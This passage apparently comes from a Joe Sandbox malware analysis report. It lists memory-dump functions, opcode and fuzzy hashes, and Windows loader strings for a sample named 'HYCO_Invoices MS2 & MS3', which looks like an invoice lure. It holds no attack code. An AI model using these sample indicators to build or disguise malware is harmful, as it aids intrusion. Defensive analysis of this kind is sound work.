                                                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: MUI
                                                                                                                                        • API String ID: 0-1339004836
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: GlobalTags
                                                                                                                                        • API String ID: 0-1106856819
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: .mui
                                                                                                                                        • API String ID: 0-1199573805
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: EXT-
                                                                                                                                        • API String ID: 0-1948896318
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: BinaryHash
                                                                                                                                        • API String ID: 0-2202222882
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: #
                                                                                                                                        • API String ID: 0-1885708031
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: BinaryName
                                                                                                                                        • API String ID: 0-215506332
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0107895E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                        • API String ID: 0-702105204
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c272d4529fa8396d26b20a39148f7fe67417b612353f9bf00b02d523eaf6c8c3
                                                                                                                                        • Instruction ID: ebfab87ad567a04a31862cdd2be6f755e7f73353695677b4638e646a08760eaf
                                                                                                                                        • Opcode Fuzzy Hash: c272d4529fa8396d26b20a39148f7fe67417b612353f9bf00b02d523eaf6c8c3
                                                                                                                                        • Instruction Fuzzy Hash: 08A1B170B027169FDB29CF69C590BAAB7E9FF84314F044069FA8597286DB34E901CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c91ea4c7d1cff72fee6831015b68d980c7f1b063805157ea11ab96f44ae37c4a
                                                                                                                                        • Instruction ID: dcf882422a22619f5d58d5756364059d5b3001f119e129d04fd3937ddaf83c64
                                                                                                                                        • Opcode Fuzzy Hash: c91ea4c7d1cff72fee6831015b68d980c7f1b063805157ea11ab96f44ae37c4a
                                                                                                                                        • Instruction Fuzzy Hash: 5CA1A772A04602AFD722DF18C990B6EBBE9FB58B04F45066CE589DB691C735E804CF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d47f40062cb0b4781ea6f5a38c508dea06cc88f53976977d763476334ce4eb77
                                                                                                                                        • Instruction ID: 780f249ed4e234ab7bd6152e5f0763d493443d9119201ceddd28f4b2ac94d98c
                                                                                                                                        • Opcode Fuzzy Hash: d47f40062cb0b4781ea6f5a38c508dea06cc88f53976977d763476334ce4eb77
                                                                                                                                        • Instruction Fuzzy Hash: 1791D671D00A19AFEB15CF58D884BAEBFF5AF48310F158159E681EB341D736E900CBA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 96fe32de5f85b2af6e60a01e7cddffd5ef73f3eb5bb8bebe24ad1e95ccd7af28
                                                                                                                                        • Instruction ID: 4653e27482c3edd927235550e04c54002a69986eb40e55cbf5208c5400284d73
                                                                                                                                        • Opcode Fuzzy Hash: 96fe32de5f85b2af6e60a01e7cddffd5ef73f3eb5bb8bebe24ad1e95ccd7af28
                                                                                                                                        • Instruction Fuzzy Hash: 0E915531A00612CBFB66DB59C444BBEBBE1EF94714F0548A9EDC5AB2C0EB35D841CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2794d517423aaee69e4f1678ec5e9bb72b0775cadc789e24b995d76e6c7041ef
                                                                                                                                        • Instruction ID: de5ce8ed616312b739f4226b1d605d74e0869c6778b8884aee1c2674e9ada394
                                                                                                                                        • Opcode Fuzzy Hash: 2794d517423aaee69e4f1678ec5e9bb72b0775cadc789e24b995d76e6c7041ef
                                                                                                                                        • Instruction Fuzzy Hash: 4C8183B1E0061A9BDB18CF69D990ABEBBF9FB48700F04853EE485D7640E735D941CB94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                        • Instruction ID: 75d0c2f9ab91e9fcb9554644b142c109af89994a75667b39ebfaa3612998b9a4
                                                                                                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                        • Instruction Fuzzy Hash: C0815D71B00209DFDF19DF98C8C0AEEBBF6AF84210F1985A9D9969B345DB34E901CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f931f236654970e271f86db46ff339a6ac7d5cb848200901a88960c721317f36
                                                                                                                                        • Instruction ID: 2737fe0d15afb9adbcd63d48983fa421407dbcd728d9d16c27dcf005c20c0e51
                                                                                                                                        • Opcode Fuzzy Hash: f931f236654970e271f86db46ff339a6ac7d5cb848200901a88960c721317f36
                                                                                                                                        • Instruction Fuzzy Hash: BD816371A40619EFDB25CFA9C880BEEBBF9FF88354F108429E595A7250D730AC45CB60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b5b38f3ea4d90ab9bb149a4228bcba7edd21f2c8900c58ca1aadd4ec8a7be463
                                                                                                                                        • Instruction ID: 974aa8ceb4dbc41be9adffca770ee10c76c4d8a6c53d9cef3928581b47e8b6fa
                                                                                                                                        • Opcode Fuzzy Hash: b5b38f3ea4d90ab9bb149a4228bcba7edd21f2c8900c58ca1aadd4ec8a7be463
                                                                                                                                        • Instruction Fuzzy Hash: 6571E275C00625DBEB668F5AD9407BEBBF4FF58710F14819AEC86AB390D3755800CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 598be739bb7f6d7f450386bd3a8b3ea09d6f5f94fac8082bd77f18e636a55b28
                                                                                                                                        • Instruction ID: af0c52f0b8a48d7f104cab7fdd1a277b2acfc61f978a80fb52def3ad79c209a3
                                                                                                                                        • Opcode Fuzzy Hash: 598be739bb7f6d7f450386bd3a8b3ea09d6f5f94fac8082bd77f18e636a55b28
                                                                                                                                        • Instruction Fuzzy Hash: 4B719E749082669FCB15EF59C840ABEBBF5EF45304F44C09AE9D8DB242E335DA45C7A0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fd9ec84e33c4845b850d0ce12ed635e31624b25a50c0d2ad562fd3f4d83ccc52
                                                                                                                                        • Instruction ID: c413307da028c86c94268f8b0ef908e76df8e2e205c630be24f51a97809f3ca0
                                                                                                                                        • Opcode Fuzzy Hash: fd9ec84e33c4845b850d0ce12ed635e31624b25a50c0d2ad562fd3f4d83ccc52
                                                                                                                                        • Instruction Fuzzy Hash: 4471B2756046429FE352DF28C884B6AB7E5FF88310F0585AAE8D9CB392DB34DC45CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                        • Instruction ID: e898cfbdb31ce9cefea14b6104f7016e9ba6e49547f4ee841f18ba29b9aae3cf
                                                                                                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                        • Instruction Fuzzy Hash: 6B716D71E0061AAFDB11DFA9C984EDEBBB8FF48700F104569E545EB290DB34EA01CB94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 38c7a972757c22a7c677e1daf7af36ffee3a63c3ad17def15a2db435cd3a9582
                                                                                                                                        • Instruction ID: 08c22d8a59dd430b9e13dadd37c0e8604c4ba03f58d084ba1c892e9ad3c164ea
                                                                                                                                        • Opcode Fuzzy Hash: 38c7a972757c22a7c677e1daf7af36ffee3a63c3ad17def15a2db435cd3a9582
                                                                                                                                        • Instruction Fuzzy Hash: 1771E631104B01AFE732EF18C844F5ABBE6FF44724F168558E2D68B2A1DB76E944CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e5c54669b9112a5333eca70d95baa9dfffd0a1050062200b50a551844c66e3a1
                                                                                                                                        • Instruction ID: 61a17388bc476b0490bb976c7557b893f937437e7020e4a33462d8da21d2726f
                                                                                                                                        • Opcode Fuzzy Hash: e5c54669b9112a5333eca70d95baa9dfffd0a1050062200b50a551844c66e3a1
                                                                                                                                        • Instruction Fuzzy Hash: 6141E2716003069FD766EF28C884A9BB7EAFF88314F044869E9D7C7255EB39E8458B50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                        • Instruction ID: 1eb235bd23b1cf69770dd20993c09647313857b9621e7dda1e25ed1253718ea9
                                                                                                                                        • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                        • Instruction Fuzzy Hash: 6A518A35A00225CFCB55DF98C580AAEF7F6FF84710F2481A9D995A7351D730AE42CB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 11e174207110ca61626d42e76ee5e56c6a8fd9933ea486e249a78b0e7994ec44
                                                                                                                                        • Instruction ID: 05a07ae4ca5a568ace9cb362e7210a951db0b4d9871fabaa2cf6d6f9d0982fa6
                                                                                                                                        • Opcode Fuzzy Hash: 11e174207110ca61626d42e76ee5e56c6a8fd9933ea486e249a78b0e7994ec44
                                                                                                                                        • Instruction Fuzzy Hash: 8B51147090020ADFDB668B28CD04BF9B7B1EF15318F1482A5E5A9D72E1DB399981DF80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a7a61994331922ccc503f27f991d901e7ec778dca075abeea24cffc85035ac19
                                                                                                                                        • Instruction ID: c5695517e2c0d0d16f3e9b292000010b3e2ba90b673960f7fac9797012150355
                                                                                                                                        • Opcode Fuzzy Hash: a7a61994331922ccc503f27f991d901e7ec778dca075abeea24cffc85035ac19
                                                                                                                                        • Instruction Fuzzy Hash: FD419571A0022CDFDB61EF68C980BEA77B4FF45750F0101A5E988AB251DB789E80DF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                        • Instruction ID: ed901984b02a3c402c7b794de4d923ed7f36c54ae89f5f9376feea76d36747fe
                                                                                                                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                        • Instruction Fuzzy Hash: 1C419475B10206ABDB15DF99CCD4AEFBBFEBF88604F1480AAE584A7361D670DD008760
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b2c3d822bb626f8016ea681acf2d8737a48d2fc6188124248be1911c646879aa
                                                                                                                                        • Instruction ID: 39d5fb216855cc1cb34824314de6c736c5ab560b9bcbbbe691958d4b853624a0
                                                                                                                                        • Opcode Fuzzy Hash: b2c3d822bb626f8016ea681acf2d8737a48d2fc6188124248be1911c646879aa
                                                                                                                                        • Instruction Fuzzy Hash: 5841AFB160070A9FE735CF24C480A32B7F9FF48314B204A6DD69686B62EB71E845DB94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: aab2775e9d3d1137cc31e15d636eec106ea95028d841dde98ab6854a48f72b4a
                                                                                                                                        • Instruction ID: 679f0bc9582b8a7f043ad43ec67fadcde0361ca9d42ac7f7987e404858dba145
                                                                                                                                        • Opcode Fuzzy Hash: aab2775e9d3d1137cc31e15d636eec106ea95028d841dde98ab6854a48f72b4a
                                                                                                                                        • Instruction Fuzzy Hash: 3641E232A46244CFDF61DF69D4847EE7BF1FB54B24F0401A5D4A1EB289DB399900CBA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 53f9482dcf7f8fab3eed7aa1e5d939ab26883e2d7336948d65d732117151e4c2
                                                                                                                                        • Instruction ID: c1155f545bf98a901c5791fc79662bb47956ace09ef2bac9c68ed93dc2dbeaa2
                                                                                                                                        • Opcode Fuzzy Hash: 53f9482dcf7f8fab3eed7aa1e5d939ab26883e2d7336948d65d732117151e4c2
                                                                                                                                        • Instruction Fuzzy Hash: B041F83290020ACBD7249F49C88466E7BF5FF84B54F15812ADA41DF266DB799C42DFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4d835a6d44f477a5f6539e747cc9f2d52c65bacb6645b7cab9ddc3d5f46f55da
                                                                                                                                        • Instruction ID: 12bb92539ad8afe79ca4140f87b23ad8e3dd75c46f49cc113509dd57846c0543
                                                                                                                                        • Opcode Fuzzy Hash: 4d835a6d44f477a5f6539e747cc9f2d52c65bacb6645b7cab9ddc3d5f46f55da
                                                                                                                                        • Instruction Fuzzy Hash: CF417F719083469FD312EF65C880A6BB7E9BF84B94F40092AF984D7150E731DE059B93
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
